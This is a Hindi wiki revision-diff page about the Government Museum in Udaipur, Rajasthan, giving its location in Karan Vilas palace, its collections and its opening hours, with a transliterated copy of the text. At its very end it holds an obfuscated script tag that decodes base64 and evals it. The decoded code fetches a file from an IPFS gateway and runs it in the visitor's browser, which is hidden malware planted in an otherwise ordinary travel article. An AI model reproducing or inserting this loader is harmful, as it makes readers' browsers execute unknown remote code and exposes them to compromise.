Difference between revisions of "सरकारी संग्रहालय उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "हिंदी" to "हिन्दी")
Line 1: Line 1:
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
+
{{सूचना बक्सा संग्रहालय
*[[कृष्ण]] और [[रुक्मिणी]] के [[चित्रकला राजपूत शैली#मेवाड़ शैली|मेवाड़ शैली]] में बने हुए बहुत से चित्र भी संग्रहालय में रखे हुए हैं।
+
|चित्र=Government-Museum-Udaipur.jpg
*यहाँ बहुत से प्रतिमाएं भी रखी हुई हैं।  इसमें ख़ुर्रम (बाद में [[शाहजहाँ]]) का साफ़ा भी रखा हुआ है। ख़ुर्रम ने जब [[जहाँगीर]] के ख़िलाफ़ विद्रोह किया था तो वह उदयपुर में ही रहा था। <ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=82 |title=सरकारी संग्रहालय  |accessmonthday=[[25 मई]] |accessyear=[[2010]] |last= |first= |authorlink= |format=ए.एस.पी |publisher=यात्रा सलाह |language=[[हिन्दी]] }}</ref>
+
|चित्र का नाम=राजकीय संग्रहालय, उदयपुर
 +
|विवरण= [[सिटी पैलेस काम्‍पलेक्‍स उदयपुर|सिटी पैलेस काम्‍पलेक्‍स]] के पास 'करन विलास महल' में स्थित है।
 +
|राज्य=[[राजस्थान]]  
 +
|नगर=[[उदयपुर]]
 +
|निर्माण=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=खुदाई वस्तुएँ, [[शिलालेख]], मूर्तियां, चित्रकारी
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=खुलने का समय
 +
|पाठ 1=प्रात: 10.00 बजे से 4.30 बजे तक
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''सरकारी अथवा राजकीय संग्रहालय, उदयपुर'''  [[राजस्थान]] के [[सिटी पैलेस काम्‍पलेक्‍स उदयपुर|सिटी पैलेस काम्‍पलेक्‍स]] के पास 'करन विलास महल' में स्थित है। पहले ये गुलाब बाग़ में स्थित था और इसे विक्टोरिया हॉल कहा जाता था।
 +
* यह संग्रहालय खुदाई वस्तुएँ, [[शिलालेख]], मूर्तियां, चित्रकारी और हस्तशिल्प कला के नमूनों के लिए प्रसिद्ध है।
 +
* [[कृष्ण]] और [[रुक्मिणी]] के [[चित्रकला राजपूत शैली#मेवाड़ शैली|मेवाड़ शैली]] में बने हुए बहुत से चित्र भी संग्रहालय में रखे हुए हैं।
 +
*यहाँ बहुत से प्रतिमाएं भी रखी हुई हैं।  इसमें [[ख़ुर्रम]] (बाद में [[शाहजहाँ]]) का साफ़ा भी रखा हुआ है। ख़ुर्रम ने जब [[जहाँगीर]] के ख़िलाफ़ विद्रोह किया था तो वह उदयपुर में ही रहा था।
 +
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। 
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति  
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1  
 
|माध्यमिक=  
 
|पूर्णता=  
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==बाहरी कड़ियाँ==
 +
*[http://www.onlytravelguide.com/rajasthan/historical/museum-udaipur.php Museum Udaipur]
 +
*[http://members.virtualtourist.com/m/p/m/1b54b7/Government Museum]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}{{संग्रहालय}}
 
{{राजस्थान के पर्यटन स्थल}}{{संग्रहालय}}

Revision as of 12:12, 7 May 2013

sarakari sangrahalay udayapur
vivaran siti pailes kamh‍palekh‍s ke pas 'karan vilas mahal' mean sthit hai.
rajy rajasthan
nagar udayapur
prasiddhi khudaee vastuean, shilalekh, moortiyaan, chitrakari
khulane ka samay prat: 10.00 baje se 4.30 baje tak

sarakari athava rajakiy sangrahalay, udayapur rajasthan ke siti pailes kamh‍palekh‍s ke pas 'karan vilas mahal' mean sthit hai. pahale ye gulab bag mean sthit tha aur ise viktoriya h aaul kaha jata tha.

  • yah sangrahalay khudaee vastuean, shilalekh, moortiyaan, chitrakari aur hastashilp kala ke namoonoan ke lie prasiddh hai.
  • krishna aur rukmini ke meva d shaili mean bane hue bahut se chitr bhi sangrahalay mean rakhe hue haian.
  • yahaan bahut se pratimaean bhi rakhi huee haian. isamean khurram (bad mean shahajahaan) ka safa bhi rakha hua hai. khurram ne jab jahaangir ke khilaf vidroh kiya tha to vah udayapur mean hi raha tha.
  • udayapur rajasthan ka ek khoobasoorat shahar hai. aur udayapur paryatan ka sabase akarshak sthal mana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>